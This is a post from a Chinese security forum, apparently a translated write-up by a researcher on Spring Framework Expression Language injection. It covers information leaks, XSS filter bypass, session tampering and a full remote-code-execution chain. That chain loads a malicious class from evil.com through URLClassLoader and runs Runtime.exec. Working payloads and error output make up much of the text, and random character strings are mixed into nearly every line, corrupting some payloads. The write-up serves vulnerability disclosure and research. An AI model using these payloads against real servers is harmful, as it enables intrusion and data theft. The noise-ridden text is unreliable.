找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2329|回复: 0
打印 上一主题 下一主题

spring-远程代码注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:47:24 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Remote Code with
# u6 Z9 U8 h( Y4 \$ r, X0 pExpression Language Injection- k0 T) M7 t/ D2 s0 \7 J3 G, n7 J
Spring Framework脆弱性—DanAmodio
+ F. O! b( p$ B# x全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中$ C; n. f& [0 e/ d; \* i4 w
可能会存在风险。
1 W6 Y- r6 w" `; i( s7 N& ^# g在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的" d4 D& d9 F; Q% ^' i' U9 V; u* j
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可6 P: z; A3 G, X0 U7 _# g
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
( ~. U+ c. l$ N0 B0 Y3 Q0 N, H以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前7 S/ k6 S; E4 I% T" \. q, S% |
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
' D# W  I+ M9 _6 W# A由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但9 W6 M% h& L9 B
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版* v( {+ Y+ j$ p' _0 A$ {8 J5 ^
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
& X/ \! P8 V0 ^. k# ^这些版本不支持禁用double EL resolution.
0 p, N! a  B9 A" S! W这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
  I: K" E$ p7 a' dEL2.2容器上可能进行远程代码执行。% P# y" v4 }- ]1 f
这是一个原始信息泄露的攻击例子:, P* a! S: d  X4 n: V
请求:
( J" l+ P) }) ]5 ^. ^ttp://vulnerable.com/foo?message=${applicationScope}
$ i3 K* l: C& W5 X8 N' {6 ^6 I" x3 }到达以下内容页面:) L- t( g8 ?1 B4 T
结果将输出一些包含内部服务器信息calsspath 和本地工作目录
4 d5 ^9 ]3 A3 ^( O你也可以做一些其他事情,如这样:/ A2 h) C$ |  k: x
${9999+1}
1 w" L2 c+ P+ w7 c/ H- o还可以访问session 对象和beans1 f7 w7 d5 d5 q" B$ Z
${employee.lastName}* V' a5 y& T9 o4 |" t0 e
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
1 j% l! s2 a; J8 FEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东' J4 G* C( [% T
西,比如XSS.5 y* [6 N* `% V9 v  ^4 K
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
4 U6 X' }! {2 S( I. W突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
6 G* A$ {- Y8 i呢?”
: v8 [( |+ E0 \因此,我尝试巳缦拢�
: ?) |5 K! s% I" T1 shttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
; B$ M1 ~3 M! H& |- SP
7 g: t" f- j- b2 d/ z) q# c我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
3 q* `' T- i5 L1 S回的文本被插入进了spring:message 标签。* A$ A, ~+ J6 }# H
这里是一个最终绕过过滤的实例:7 i$ d5 A( A. @+ [# ]) ]
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1)/scriptQ
8 Q0 K' b3 t* U9 c+ D. t它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
9 W! Q; a. |2 B! H6 u+ X! {什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?1 K* K, C* o& O" `2 q/ z3 g
经过一番研究,我学习到EL2.2 增加了方法调用。
1 M( W* g" B0 r6 ~; h  Y我写了一个快速测试应用程序代码并且检测一些功能
3 ^: J: u* j& Q$ S${pageContext.request.getSession().setAttribute(“account”,”123456″)}. s6 o7 A; w) [+ _4 a  L
${pageContext.request.getSession().setAttribute(“admin”,true)}2 h$ N: w' c1 \  L
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的$ D: b+ P& P# S, G# q
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?0 ?% K; r' W9 O2 \$ I4 N
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
8 T. n7 J7 _- g$ U2 j- D0 I“, 1234)}2 |9 G8 J1 p+ p9 j; ?
${“”.getClass().forName(“java.lang.Runtime”)}6 n5 H  h5 U( l- x
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不
; c# ^% e  B2 f可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函( H- e  `; H. T6 V1 L: n; c) u
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
( ^9 V* z9 Q7 w' G; ^" o; X一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
5 V, t0 Q& ~$ M. x# j/ k方法签名invoke(Object obj, Object„ args)
' i. x' i# J6 P/ \1 W; vJeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问, e. I( Z0 w+ B* M+ n" n
题,以让它可以工作起来。
, L5 q, w5 V$ B; A+ `2 ^漏洞利用:
& Q: S- x" y& X& h& J我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
  c9 F% A( [' Z希望你们中的一些JAVA奇才告诉我我是如此的可笑。- `9 E0 e* k* b9 s6 p1 _$ g8 F
这里有一些我试过的失败的用例,为了试图让它工作的用例:) l+ W- v+ C$ Q4 y
 写文件到文件系统: B, b. k' N  A$ a( e* `% {& h3 s
 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
7 @" M; K% h9 ]0 [: B$ p# r) [! k我认为这些可以很好的工作,但是我不能找到合适的类来载入。0 C8 q! @" S% \. Y
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
/ N+ |8 ?' y. ^8 v+ ujavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:6 }- H! q( C0 s. \* L; [  e" G$ e
org.springframework.expression.spel.standard.SpelExpressionParser not found
7 H8 N3 m0 t: _  V2 d" {4 o! Iby$ V3 g( U( x/ O3 a/ o
org.glassfish.web.javax.servlet.jsp [194].. c/ `' I) r( @6 Y, y& l# u% X$ s. M
 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public- f" i( s' B* u* `  n
 利用反射来创建一个新的Runtime(and watch the world burn)
0 g( c5 u  w8 e- S1 }: T- P${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName! n8 _) u7 @- W1 h* ^: x
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}" i  P: ^- A" d- ?4 x) X
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}7 N  a/ m  K6 H
 使用java.lang.ProcessBuilder' b6 {$ T7 h- m4 o9 R: ^
 用表达式语言来评估表达式语言
- E5 g" G3 L% lExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义., Y( x$ r/ O" B! v' |9 K# X' c6 u1 v$ Z
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request7 {! x( l3 M' ~1 F; t& @8 b, W
“,”".getClass(),null)}
) J3 f# n' O; W: |. | 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
. _0 d" M, M6 _9 T5 T我在使用一个空数组通过Method.invoke()时失败了很多次$ l% q8 s- |- P- ?( ]
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo8 L4 A. e, u( s8 x* G: @( e
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A/ N. D* p  y6 G8 p
rrayList”).newInstance().toArray())& _( |5 j3 D' `
java.lang.IllegalArgumentException: wrong number of arguments6 [+ u; w* O* D. q. u
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可" B$ n; t" ]1 q; d0 a  U" s/ S
以创建一个恶意class文件并且指向类装载器.
& H2 M# |) s/ h0 p( Z/ a' F; [5 v; B( R我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
' l8 V6 w; H2 [1 V4 R0 [7 d4 Jpublic class Malicious {; E- u9 [  V( H2 R* ~7 L
public Malicious() {
6 P4 R+ Y# W  w3 w- g- C0 |try {
' P0 j/ s/ s3 ~8 v" X$ y. Ajava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
, }, \" q1 u, C3 L9 bjava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win# F) l& R2 N; P1 @' E7 j) x2 n( d  [
} catch (Exception e) {2 a* ?! g3 t' f
}
+ v$ u) R# q* S1 s0 I& p# ~1 ]0 o}
! E/ f% q$ J4 N% r/ @* t我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
+ S* S3 D/ Q$ X+ L% W话中,因此它可以被使用.4 M/ n: |6 I& M& F5 K# G
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
9 j2 U3 j; z4 Q: O5 P, O9 t(“java.util.ArrayList”).newInstance())}
+ w- S% r! ?8 OURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建* d* d# g1 x6 \; G; G" a
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和0 X! l  [$ u; s6 t# R
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
0 O# P: X7 T6 M$ G& F3 Z6 e6 w我们可以调用的create(string)方法,然后转换对一个URL对象。# M$ p. [( j  M9 ~5 v
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
) @& H9 [# n# o& M5 c4 ^( {6 X* i$ iere/malicious/classfile/is/located/”).toURL())}8 @- _* G/ i  q9 k7 @! t
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
7 C! c0 a/ L% \9 O恶意类文件被装载并创建,触发远程代码.7 w, p- p* R* O0 k8 H3 O
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
4 b' g: P3 O! W0 ^! p2 |! pxt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().2 Q3 ~) K' E; o' ?2 m3 V$ x
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance" f: g; Y, T/ f6 `5 T
()}
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表